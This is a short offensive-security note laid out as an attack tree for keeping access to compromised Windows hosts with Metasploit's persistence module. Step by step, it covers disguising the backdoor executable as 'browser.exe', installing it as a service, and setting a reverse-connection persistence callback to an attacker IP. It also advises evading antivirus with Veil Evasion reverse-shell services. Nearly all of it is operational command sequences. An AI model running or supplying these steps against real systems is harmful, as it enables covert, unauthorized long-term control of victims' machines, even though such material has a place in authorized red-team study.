Maintaining access on Windows

Attack tree

1 Maintain access on Windows
    1.1 In meterpreter background the current basic shell (AND)
    1.2 > use exploit/windows/local/persistence (AND)
    1.3 Set EXE_NAME to something less suspicious (like browser.exe) (AND)
    1.4 Set SESSION to the id of the basic shell just put in the background (AND)
    1.5 > show advanced
    1.6 Inject backdoor as a service with > set EXE::Custom [backdoor location] (/var/www/html/evil-files/backdoor.exe) (AND)
    1.7 > exploit
    1.8 Store the Meterpreter RC_file path for cleanup later



  • Using Veil Evasion’s rev_http_service and rev_tcp_service can be used instead of a backdoor, or uploaded from meterpreter. This does not always work.

  • Using Meterpreter’s persistence module (> run persistence -U -i 20 -p 80 -r [IP address]) is detectable by AV.

  • A combination of the two solves these problems.